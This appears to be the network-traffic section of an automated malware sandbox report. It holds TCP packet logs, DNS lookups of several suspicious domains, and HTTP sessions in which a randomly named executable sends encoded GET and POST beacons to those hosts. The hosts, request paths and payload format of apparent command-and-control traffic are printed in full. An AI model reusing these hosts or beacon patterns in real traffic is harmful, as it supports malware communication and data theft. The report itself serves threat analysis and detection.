                                                    Nov 21, 2024 16:18:19.133477926 CET8049985216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:19.133533001 CET8049985216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:19.133568048 CET8049985216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:19.133584023 CET4998580192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:19.133603096 CET8049985216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:19.133637905 CET8049985216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:19.133645058 CET4998580192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:19.133673906 CET8049985216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:19.133707047 CET8049985216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:19.133725882 CET4998580192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:19.133744955 CET8049985216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:19.133788109 CET4998580192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:19.253535986 CET8049985216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:19.253649950 CET8049985216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:19.253695011 CET4998580192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:19.257635117 CET8049985216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:19.343636990 CET8049985216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:19.343678951 CET8049985216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:19.343708992 CET4998580192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:19.347747087 CET8049985216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:19.347796917 CET4998580192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:19.348964930 CET8049985216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:19.349018097 CET4998580192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:19.408972979 CET4998580192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:20.428481102 CET4998680192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:20.548232079 CET8049986216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:20.548485994 CET4998680192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:20.572494030 CET4998680192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:20.692054987 CET8049986216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:21.717551947 CET8049986216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:21.717633009 CET8049986216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:21.717686892 CET8049986216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:21.717725039 CET8049986216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:21.717739105 CET4998680192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:21.717760086 CET8049986216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:21.717809916 CET4998680192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:21.717813015 CET8049986216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:21.717848063 CET8049986216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:21.717858076 CET4998680192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:21.717889071 CET8049986216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:21.717921972 CET8049986216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:21.717937946 CET4998680192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:21.717962027 CET8049986216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:21.718028069 CET4998680192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:21.837644100 CET8049986216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:21.837719917 CET8049986216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:21.837780952 CET4998680192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:21.910273075 CET8049986216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:21.910370111 CET8049986216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:21.910418987 CET4998680192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:21.914442062 CET8049986216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:21.915707111 CET8049986216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:21.915766954 CET4998680192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:22.081026077 CET4998680192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:23.118932962 CET4998780192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:23.238573074 CET8049987216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:23.238651037 CET4998780192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:23.256458998 CET4998780192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:23.376852989 CET8049987216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:23.376929045 CET8049987216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:24.519996881 CET8049987216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:24.520073891 CET8049987216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:24.520128965 CET8049987216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:24.520181894 CET8049987216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:24.520221949 CET8049987216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:24.520226002 CET4998780192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:24.520253897 CET4998780192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:24.520256042 CET8049987216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:24.520289898 CET8049987216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:24.520320892 CET4998780192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:24.520323992 CET8049987216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:24.520356894 CET8049987216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:24.520389080 CET4998780192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:24.520392895 CET8049987216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:24.520538092 CET4998780192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:24.640146971 CET8049987216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:24.640239000 CET8049987216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:24.640706062 CET4998780192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:24.721029997 CET8049987216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:24.721136093 CET8049987216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:24.721333027 CET4998780192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:24.726908922 CET8049987216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:24.726943016 CET8049987216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:24.727247953 CET4998780192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:24.730570078 CET8049987216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:24.732537985 CET4998780192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:24.768800020 CET4998780192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:25.842891932 CET4998880192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:25.962498903 CET8049988216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:25.962620020 CET4998880192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:25.974109888 CET4998880192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:26.094162941 CET8049988216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:27.090627909 CET8049988216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:27.090663910 CET8049988216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:27.090706110 CET8049988216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:27.090794086 CET8049988216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:27.090828896 CET8049988216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:27.090850115 CET4998880192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:27.090867043 CET8049988216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:27.090895891 CET8049988216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:27.090898991 CET4998880192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:27.090928078 CET8049988216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:27.090955019 CET4998880192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:27.091074944 CET4998880192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:27.096484900 CET4998880192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:27.216094971 CET8049988216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:32.661160946 CET4998980192.168.2.513.248.169.48
                                                    Nov 21, 2024 16:18:32.780752897 CET804998913.248.169.48192.168.2.5
                                                    Nov 21, 2024 16:18:32.784564972 CET4998980192.168.2.513.248.169.48
                                                    Nov 21, 2024 16:18:32.802555084 CET4998980192.168.2.513.248.169.48
                                                    Nov 21, 2024 16:18:32.922586918 CET804998913.248.169.48192.168.2.5
                                                    Nov 21, 2024 16:18:34.165496111 CET804998913.248.169.48192.168.2.5
                                                    Nov 21, 2024 16:18:34.167613029 CET4998980192.168.2.513.248.169.48
                                                    Nov 21, 2024 16:18:34.315344095 CET4998980192.168.2.513.248.169.48
                                                    Nov 21, 2024 16:18:34.436166048 CET804998913.248.169.48192.168.2.5
                                                    Nov 21, 2024 16:18:35.336685896 CET4999080192.168.2.513.248.169.48
                                                    Nov 21, 2024 16:18:35.456259966 CET804999013.248.169.48192.168.2.5
                                                    Nov 21, 2024 16:18:35.456336021 CET4999080192.168.2.513.248.169.48
                                                    Nov 21, 2024 16:18:35.477149963 CET4999080192.168.2.513.248.169.48
                                                    Nov 21, 2024 16:18:35.596626043 CET804999013.248.169.48192.168.2.5
                                                    Nov 21, 2024 16:18:36.605093002 CET804999013.248.169.48192.168.2.5
                                                    Nov 21, 2024 16:18:36.605187893 CET4999080192.168.2.513.248.169.48
                                                    Nov 21, 2024 16:18:36.987288952 CET4999080192.168.2.513.248.169.48
                                                    Nov 21, 2024 16:18:37.107032061 CET804999013.248.169.48192.168.2.5
                                                    Nov 21, 2024 16:18:38.007941961 CET4999180192.168.2.513.248.169.48
                                                    Nov 21, 2024 16:18:38.128370047 CET804999113.248.169.48192.168.2.5
                                                    Nov 21, 2024 16:18:38.128468990 CET4999180192.168.2.513.248.169.48
                                                    Nov 21, 2024 16:18:38.147913933 CET4999180192.168.2.513.248.169.48
                                                    Nov 21, 2024 16:18:38.267544031 CET804999113.248.169.48192.168.2.5
                                                    Nov 21, 2024 16:18:38.267641068 CET804999113.248.169.48192.168.2.5
                                                    Nov 21, 2024 16:18:39.226828098 CET804999113.248.169.48192.168.2.5
                                                    Nov 21, 2024 16:18:39.226917028 CET4999180192.168.2.513.248.169.48
                                                    Nov 21, 2024 16:18:39.659007072 CET4999180192.168.2.513.248.169.48
                                                    Nov 21, 2024 16:18:39.778702974 CET804999113.248.169.48192.168.2.5
                                                    Nov 21, 2024 16:18:40.678678036 CET4999280192.168.2.513.248.169.48
                                                    Nov 21, 2024 16:18:40.798530102 CET804999213.248.169.48192.168.2.5
                                                    Nov 21, 2024 16:18:40.798686028 CET4999280192.168.2.513.248.169.48
                                                    Nov 21, 2024 16:18:40.810096025 CET4999280192.168.2.513.248.169.48
                                                    Nov 21, 2024 16:18:40.929672956 CET804999213.248.169.48192.168.2.5
                                                    Nov 21, 2024 16:18:41.990622997 CET804999213.248.169.48192.168.2.5
                                                    Nov 21, 2024 16:18:41.990643978 CET804999213.248.169.48192.168.2.5
                                                    Nov 21, 2024 16:18:41.990762949 CET4999280192.168.2.513.248.169.48
                                                    Nov 21, 2024 16:18:41.994872093 CET4999280192.168.2.513.248.169.48
                                                    Nov 21, 2024 16:18:42.114737034 CET804999213.248.169.48192.168.2.5
                                                    Nov 21, 2024 16:18:47.665154934 CET4999380192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:47.784830093 CET8049993209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:47.785034895 CET4999380192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:47.799268961 CET4999380192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:47.918852091 CET8049993209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:49.052392006 CET8049993209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:49.052545071 CET8049993209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:49.052658081 CET4999380192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:49.315273046 CET4999380192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:50.334275961 CET4999480192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:50.453892946 CET8049994209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:50.454008102 CET4999480192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:50.468961000 CET4999480192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:50.589154005 CET8049994209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:51.737951040 CET8049994209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:51.738161087 CET8049994209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:51.738208055 CET4999480192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:51.972920895 CET4999480192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:52.990721941 CET4999580192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:53.110465050 CET8049995209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:53.110904932 CET4999580192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:53.126828909 CET4999580192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:53.246505976 CET8049995209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:53.246524096 CET8049995209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:54.456902027 CET8049995209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:54.457258940 CET8049995209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:54.457346916 CET4999580192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:54.628618002 CET4999580192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:55.648010015 CET4999680192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:55.767884970 CET8049996209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:55.767967939 CET4999680192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:55.777929068 CET4999680192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:55.897556067 CET8049996209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:57.058135986 CET8049996209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:57.058218956 CET8049996209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:57.059058905 CET4999680192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:57.062545061 CET4999680192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:57.182157040 CET8049996209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:19:03.036559105 CET4999780192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:03.158164024 CET804999738.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:03.158262968 CET4999780192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:03.172666073 CET4999780192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:03.294905901 CET804999738.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:04.676553011 CET4999780192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:04.796550989 CET804999738.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:04.796756029 CET4999780192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:05.694812059 CET4999880192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:05.814364910 CET804999838.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:05.814452887 CET4999880192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:05.832386971 CET4999880192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:05.952205896 CET804999838.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:07.346492052 CET4999880192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:07.467783928 CET804999838.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:07.467843056 CET4999880192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:08.365165949 CET4999980192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:08.490433931 CET804999938.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:08.490700006 CET4999980192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:08.506819963 CET4999980192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:08.626650095 CET804999938.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:08.626674891 CET804999938.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:10.018402100 CET4999980192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:10.138401031 CET804999938.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:10.138484955 CET4999980192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:11.037292957 CET5000080192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:11.157147884 CET805000038.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:11.157275915 CET5000080192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:11.166989088 CET5000080192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:11.286586046 CET805000038.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:12.686775923 CET805000038.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:12.686847925 CET805000038.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:12.686986923 CET5000080192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:12.692559004 CET5000080192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:12.815107107 CET805000038.47.232.194192.168.2.5

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 21, 2024 16:15:57.266604900 CET5506153192.168.2.51.1.1.1
                                                    Nov 21, 2024 16:15:58.028167009 CET53550611.1.1.1192.168.2.5
                                                    Nov 21, 2024 16:17:47.084851980 CET5432353192.168.2.51.1.1.1
                                                    Nov 21, 2024 16:17:47.484141111 CET53543231.1.1.1192.168.2.5
                                                    Nov 21, 2024 16:18:01.804431915 CET5182453192.168.2.51.1.1.1
                                                    Nov 21, 2024 16:18:02.196445942 CET53518241.1.1.1192.168.2.5
                                                    Nov 21, 2024 16:18:16.914813042 CET6418653192.168.2.51.1.1.1
                                                    Nov 21, 2024 16:18:17.765968084 CET53641861.1.1.1192.168.2.5
                                                    Nov 21, 2024 16:18:32.101095915 CET6533953192.168.2.51.1.1.1
                                                    Nov 21, 2024 16:18:32.657233953 CET53653391.1.1.1192.168.2.5
                                                    Nov 21, 2024 16:18:47.006835938 CET5133553192.168.2.51.1.1.1
                                                    Nov 21, 2024 16:18:47.662621021 CET53513351.1.1.1192.168.2.5
                                                    Nov 21, 2024 16:19:02.118531942 CET5905653192.168.2.51.1.1.1
                                                    Nov 21, 2024 16:19:03.030514956 CET53590561.1.1.1192.168.2.5

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Nov 21, 2024 16:15:57.266604900 CET192.168.2.51.1.1.10x57cbStandard query (0)www.7261ltajbc.bondA (IP address)IN (0x0001)false
                                                    Nov 21, 2024 16:17:47.084851980 CET192.168.2.51.1.1.10xd505Standard query (0)www.conansog.shopA (IP address)IN (0x0001)false
                                                    Nov 21, 2024 16:18:01.804431915 CET192.168.2.51.1.1.10xe925Standard query (0)www.rgenerousrs.storeA (IP address)IN (0x0001)false
                                                    Nov 21, 2024 16:18:16.914813042 CET192.168.2.51.1.1.10x9e74Standard query (0)www.sipdontshoot.netA (IP address)IN (0x0001)false
                                                    Nov 21, 2024 16:18:32.101095915 CET192.168.2.51.1.1.10xdfe6Standard query (0)www.tals.xyzA (IP address)IN (0x0001)false
                                                    Nov 21, 2024 16:18:47.006835938 CET192.168.2.51.1.1.10x612fStandard query (0)www.hobbihub.infoA (IP address)IN (0x0001)false
                                                    Nov 21, 2024 16:19:02.118531942 CET192.168.2.51.1.1.10x54f8Standard query (0)www.76kdd.topA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Nov 21, 2024 16:15:58.028167009 CET1.1.1.1192.168.2.50x57cbNo error (0)www.7261ltajbc.bond154.12.28.184A (IP address)IN (0x0001)false
                                                    Nov 21, 2024 16:17:47.484141111 CET1.1.1.1192.168.2.50xd505No error (0)www.conansog.shop104.21.41.74A (IP address)IN (0x0001)false
                                                    Nov 21, 2024 16:17:47.484141111 CET1.1.1.1192.168.2.50xd505No error (0)www.conansog.shop172.67.162.12A (IP address)IN (0x0001)false
                                                    Nov 21, 2024 16:18:02.196445942 CET1.1.1.1192.168.2.50xe925No error (0)www.rgenerousrs.store172.67.167.146A (IP address)IN (0x0001)false
                                                    Nov 21, 2024 16:18:02.196445942 CET1.1.1.1192.168.2.50xe925No error (0)www.rgenerousrs.store104.21.57.248A (IP address)IN (0x0001)false
                                                    Nov 21, 2024 16:18:17.765968084 CET1.1.1.1192.168.2.50x9e74No error (0)www.sipdontshoot.net216.40.34.41A (IP address)IN (0x0001)false
                                                    Nov 21, 2024 16:18:32.657233953 CET1.1.1.1192.168.2.50xdfe6No error (0)www.tals.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                    Nov 21, 2024 16:18:32.657233953 CET1.1.1.1192.168.2.50xdfe6No error (0)www.tals.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                    Nov 21, 2024 16:18:47.662621021 CET1.1.1.1192.168.2.50x612fNo error (0)www.hobbihub.info209.74.77.108A (IP address)IN (0x0001)false
                                                    Nov 21, 2024 16:19:03.030514956 CET1.1.1.1192.168.2.50x54f8No error (0)www.76kdd.top76kdd.topCNAME (Canonical name)IN (0x0001)false
                                                    Nov 21, 2024 16:19:03.030514956 CET1.1.1.1192.168.2.50x54f8No error (0)76kdd.top38.47.232.194A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • www.7261ltajbc.bond
                                                    • www.conansog.shop
                                                    • www.rgenerousrs.store
                                                    • www.sipdontshoot.net
                                                    • www.tals.xyz
                                                    • www.hobbihub.info
                                                    • www.76kdd.top

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.549801154.12.28.184806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:15:58.165290117 CET530OUTGET /cbbl/?StWXF0Jx=paPsyhkx/nE5gApK7ClsOsCP/JDiOaF/PnUzFNUQtr02YB3yPLZBYvOPPEhjPOJc5o/riszcMLT4SZEyBJ2Z4+e1R3WiL7BxGKUkfd9BrL6F2CyldUW6llWN7R81fMOOmA==&zfI=jXEDeV4Xp62 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US
                                                    Host: www.7261ltajbc.bond
                                                    Connection: close
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Nov 21, 2024 16:17:42.073976994 CET295INHTTP/1.1 502 Bad Gateway
                                                    Server: nginx
                                                    Date: Thu, 21 Nov 2024 15:17:41 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 150
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.549977104.21.41.74806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:17:47.623888016 CET786OUTPOST /us5e/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.conansog.shop
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Origin: http://www.conansog.shop
                                                    Referer: http://www.conansog.shop/us5e/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 7a 31 59 39 79 6b 64 41 66 58 6b 48 54 57 73 37 33 72 4e 43 53 5a 65 71 4a 6d 44 73 63 4e 65 31 31 38 45 71 73 47 59 44 61 39 64 62 39 49 6b 45 73 33 4d 61 76 63 63 44 65 65 4e 68 54 6b 6b 34 79 67 4e 39 4f 64 6d 58 37 76 2b 57 79 36 5a 41 5a 61 4a 31 49 61 6a 62 62 55 68 69 65 47 47 33 6c 30 4f 6f 53 63 34 62 42 55 4f 7a 70 56 56 72 6a 66 4d 57 34 35 38 4e 63 33 72 34 32 46 74 69 4e 5a 51 41 58 6f 5a 62 76 76 2b 53 58 6d 4b 53 68 57 76 6e 55 6f 4e 46 75 45 70 47 67 53 77 50 71 68 39 37 32 52 62 48 32 57 4d 4c 6d 77 51 5a 43 33 5a 49 74 75 73 58 6b 6a 46 38 31 53 32 52 64 4c 4d 72 2b 59 55 3d
                                                    Data Ascii: StWXF0Jx=z1Y9ykdAfXkHTWs73rNCSZeqJmDscNe118EqsGYDa9db9IkEs3MavccDeeNhTkk4ygN9OdmX7v+Wy6ZAZaJ1IajbbUhieGG3l0OoSc4bBUOzpVVrjfMW458Nc3r42FtiNZQAXoZbvv+SXmKShWvnUoNFuEpGgSwPqh972RbH2WMLmwQZC3ZItusXkjF81S2RdLMr+YU=
                                                    Nov 21, 2024 16:17:48.784892082 CET746INHTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:17:48 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UL%2BQQ4tCCc6AxpKhva%2BzfcEbRTuxvV5VfAOfeCcAzI8zySXbY24csgCfUcvhOnDFovHjhBw0rolMNv%2B3IRzyAch%2BdJg%2BbrGJCuXBmZbWoxIfTijoPgOSnWKIxEWr%2FPlFS01a%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e61a6125ab40f68-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1652&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.549978104.21.41.74806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:17:50.282717943 CET806OUTPOST /us5e/ HTTP/1.1
